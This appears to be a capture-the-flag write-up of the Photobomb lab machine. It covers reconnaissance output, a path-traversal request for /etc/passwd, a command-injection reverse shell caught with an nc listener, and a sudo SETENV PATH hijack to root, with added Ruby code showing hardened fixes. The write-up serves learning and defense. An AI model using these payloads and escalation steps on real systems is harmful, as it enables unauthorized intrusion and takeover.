Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-05 15:57 CST
Nmap scan report for 10.10.11.182
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=12/5%OT=22%CT=1%CU=34665%PV=Y%DS=2%DC=I%G=Y%TM=638E699
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(CI=Z)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O
OS:5=M539ST11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.18 seconds
/etc/hosts
10.10.11.182 photobomb.htb
$ nikto -h photobomb.htb
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 10.10.11.182
+ Target Hostname: photobomb.htb
+ Target Port: 80
+ Start Time: 2022-12-05 16:33:14 (GMT-6)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-content-type-options' found, with contents: nosniff
+ Uncommon header 'x-xss-protection' found, with contents: 1; mode=block
+ Uncommon header 'x-cascade' found, with contents: pass
+ No CGI Directories found (use '-C all' to force check all possible dirs)
Web Server
The home page (http://photobomb.htb/) links to /printer, but that path prompts for HTTP basic authentication. Let's keep looking.
photobomb.js checks document.cookie for a specific cookie and, if it is present, writes the credentials needed for /printer into a link with class creds:
photobomb.js
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','REDACTED');
}
You could set the cookie with document.cookie and reload the page, or copy the creds and log in manually. Either way, logging in shows a simple form: pick a picture, a file type and a size, then Download. In the DevTools Network tab, the Download button sends a POST request to /printer with three form fields: photo, filetype and dimensions.
The photo field suggests a possible path traversal. Let's test it with Burp Suite.
Request
POST /printer HTTP/1.1
Host: photobomb.htb
Content-Length: 79
...
Content-Type: application/x-www-form-urlencoded
Cookie: isPhotoBombTechSupport=TRUE
special-dev: only4dev
Authorization: Basic REDACTED
Connection: close
photo=../../../../../../../../../../../etc/passwd&filetype=png&dimensions=30x20
Response
HTTP/1.1 500 Internal Server Error
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Dec 2022 22:26:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14
Connection: close
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Invalid photo.
After a few tries in Burp Suite's Repeater with different URL-encoded and unencoded values for photo, I couldn't get anything other than a 500. Time to look harder.
How about the other params? They may well be arguments to an external command such as ffmpeg or ImageMagick's convert, which would make this command injection rather than path traversal. How about some good ol' RCE exploitation?
Let's open an nc listener on our machine, URL-encode the payload, append it to the filetype field, and see if it works.
$ nc -lvkp 4242
listening on [any] 4242 ...
connect to [10.10.16.52] from photobomb.htb [10.10.11.182] 59346
bash: cannot set terminal process group (700): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$
After trying a couple of different payloads, the mkfifo reverse shell worked. You can see the payload description and comments here.
Loot Gathering
Now that we have a bash shell as the wizard user, let's look around. Out of curiosity, I looked at server.rb to see the code behind the bug we just exploited.
~/photobomb/server.rb
...
  if !filetype.match(/^(png|jpg)/) # weak regex: anchored only at the start, so anything after "png" or "jpg" is accepted
    halt 500, 'Invalid filetype.'
  end
  filename = photo.sub('.jpg', '') + '_' + dimensions + '.' + filetype
...
  if !File.exists?('resized_images/' + filename)
    # photo, dimensions and filetype are concatenated into one string and handed to system(),
    # which runs it through /bin/sh, so a ';' in any of them injects a second command
    command = 'convert source_images/' + photo + ' -resize ' + dimensions + ' resized_images/' + filename
    system(command)
...
  end
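As an added example (this is not Photobomb's server.rb, of which only the excerpt above is on this page), here is the vulnerable construction rebuilt in plain Ruby beside a hardened version: the filetype regex anchored with \A and \z instead of ^, dimensions checked against a strict pattern, photo restricted to a bare file name on an allow-list, and the convert invocation returned as an argv array so that system(*argv) execs the binary directly and no shell ever parses the parameters. The helper names, the allow-list and the photo name beach.jpg are assumptions made for this example.

```ruby
# Added example, not Photobomb's own server.rb: the writeup's checks rebuilt
# in plain Ruby next to a hardened version. Names are made up for this demo.

# Weak: /^(png|jpg)/ is anchored only at the start, and in Ruby ^ also
# matches after any newline, so "png;id" and "x\npng" both pass.
def weak_filetype_ok?(filetype)
  !filetype.match(/^(png|jpg)/).nil?
end

# Hardened: \A and \z anchor the whole string; nothing may follow png/jpg.
def strict_filetype_ok?(filetype)
  !filetype.match(/\A(png|jpg)\z/).nil?
end

# Hardened: dimensions must be exactly <digits>x<digits>, e.g. 30x20.
def strict_dimensions_ok?(dimensions)
  !dimensions.match(/\A\d{1,4}x\d{1,4}\z/).nil?
end

# Hardened: photo must be a bare file name (no "/" or "..") that is on the
# allow-list, which in the real app would be the listing of source_images/.
def strict_photo_ok?(photo, allowed)
  File.basename(photo) == photo && allowed.include?(photo)
end

# The vulnerable construction from the excerpt: one string that system()
# hands to /bin/sh, so a ';' in any parameter starts a second command.
def weak_command(photo, dimensions, filetype)
  filename = photo.sub('.jpg', '') + '_' + dimensions + '.' + filetype
  'convert source_images/' + photo + ' -resize ' + dimensions + ' resized_images/' + filename
end

# Hardened: validate every parameter first, then return an argv array.
# system(*argv) execs convert directly (no shell), so ';', '|' and '$()'
# in a parameter are just bytes in a file name. Raises on bad input.
def safe_argv(photo, dimensions, filetype, allowed)
  raise ArgumentError, 'Invalid photo.'      unless strict_photo_ok?(photo, allowed)
  raise ArgumentError, 'Invalid dimensions.' unless strict_dimensions_ok?(dimensions)
  raise ArgumentError, 'Invalid filetype.'   unless strict_filetype_ok?(filetype)
  filename = File.basename(photo, '.jpg') + '_' + dimensions + '.' + filetype
  ['convert', "source_images/#{photo}", '-resize', dimensions, "resized_images/#{filename}"]
end

# Constructed allow-list standing in for the contents of source_images/.
SAMPLE_PHOTOS = ['beach.jpg', 'forest.jpg'].freeze

if __FILE__ == $PROGRAM_NAME
  puts weak_command('beach.jpg', '30x20', 'png;id')       # the injected ";id" rides along
  p safe_argv('beach.jpg', '30x20', 'png', SAMPLE_PHOTOS) # clean argv for system(*argv)
  begin
    safe_argv('beach.jpg', '30x20', 'png;id', SAMPLE_PHOTOS)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

The prefix-only regex is exactly why a payload appended to filetype lands at the end of the convert command line: the check passes, the tail of the value is glued onto the output file name, and /bin/sh sees the ';' as a command separator. The argv form is the real fix; anchoring the regex alone still leaves photo and dimensions to be validated.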
Alright, back to looting. Wizard's home directory holds the user flag, so grab it and move on to root.
Privilege Escalation
I thought about spinning up LinPEAS and kicking back, but I wanted to learn more about privilege escalation on a Linux box. Time to go through the Linux Privilege Escalation Checklist.
Nothing too interesting from printenv. Let's get OS info and move on to enumerating possible kernel exploits.
$ uname -a
Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Searchsploit didn't give anything promising for Linux kernel 5.4.0, but I might come back later. For now, let's try linux-exploit-suggester
A bunch of results. Let's also come back to that later. We'll continue down the list. How about checking sudo privileges?
wizard@photobomb:~$ sudo -l
...
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
The SETENV tag lets the invoking user (here, wizard) set environment variables for this command on the sudo command line, as in sudo VAR=value /opt/cleanup.sh, overriding the usual env_reset. Keep note of that. And with NOPASSWD, sudo won't ask for a password to run the script. Wonderful.
/opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Alright, we see something interesting here. Most of the commands in this script are invoked by absolute path (/bin/cat, /usr/bin/truncate); I'll assume those binaries aren't writable. But find is called by bare name, so the shell resolves it through PATH. Since SETENV lets us hand our own PATH to the privileged run, let's do some unsafe PATH manipulation.
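An added example (Ruby, not the writeup's own code) that simulates the lookup the shell performs for the bare find in /opt/cleanup.sh. It builds two constructed directories under a temp dir, one standing in for /usr/bin and one for a directory wizard can write to, each holding a find of its own, and resolves the name under the script's normal PATH and under the PATH a SETENV rule lets the caller supply (sudo PATH=<dir>:$PATH /opt/cleanup.sh). The resolver, the directory names and the fake scripts are assumptions of this example; nothing here touches sudo or /opt.

```ruby
# Added example, not from the writeup: why a bare `find` inside a script run
# as root is dangerous when the caller controls PATH. Directory names and the
# fake `find` scripts are constructed here; nothing touches sudo or /opt.
require 'tmpdir'
require 'fileutils'

# Mimic the execvp(3) lookup a shell does for a bare command name: walk PATH
# left to right and return the first regular file with an execute bit set.
# A name containing '/' (like /bin/cat or /usr/bin/truncate) is never searched for.
def resolve_in_path(cmd, path)
  return cmd if cmd.include?('/')
  path.split(File::PATH_SEPARATOR).each do |dir|
    candidate = File.join(dir, cmd)
    return candidate if File.file?(candidate) && (File.stat(candidate).mode & 0o111) != 0
  end
  nil
end

def write_script(path, body)
  File.write(path, body)
  FileUtils.chmod(0o755, path)
end

# Set up a throwaway "system" bin dir and an attacker-writable dir, each with
# its own `find`, then resolve and run `find` under both PATH values: the
# script's normal PATH, and the PATH a SETENV sudo rule lets the user supply
# with `sudo PATH=<evil>:$PATH /opt/cleanup.sh`. Returns what each run printed.
def path_hijack_demo
  Dir.mktmpdir('hijack') do |tmp|
    sysbin = File.join(tmp, 'sysbin')   # stands in for /usr/bin
    evil   = File.join(tmp, 'evil')     # stands in for a dir the low-priv user can write to
    FileUtils.mkdir_p([sysbin, evil])
    write_script(File.join(sysbin, 'find'), "#!/bin/sh\necho real-find\n")
    write_script(File.join(evil, 'find'),   "#!/bin/sh\necho hijacked\n") # attacker's payload stand-in

    normal_path   = sysbin
    hijacked_path = [evil, sysbin].join(File::PATH_SEPARATOR)

    # Run the resolved script via /bin/sh explicitly so the demo also works
    # when the temp dir sits on a noexec mount.
    run = ->(exe) { IO.popen(['/bin/sh', exe], &:read).strip }
    {
      normal:   run.call(resolve_in_path('find', normal_path)),
      hijacked: run.call(resolve_in_path('find', hijacked_path)),
      absolute: resolve_in_path('/bin/cat', hijacked_path), # unaffected by PATH
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  p path_hijack_demo   # => {:normal=>"real-find", :hijacked=>"hijacked", :absolute=>"/bin/cat"}
end
```

The same resolution happens when root runs the real script: whatever sits first in PATH under the name find executes as root, while the absolute /bin/cat and /usr/bin/truncate calls are untouched. On the defending side the fix is either an absolute path for find, like the script's other commands, or an explicit PATH set at the top of the script, together with dropping SETENV from the sudoers rule, since that tag is what lets the caller replace PATH for this command.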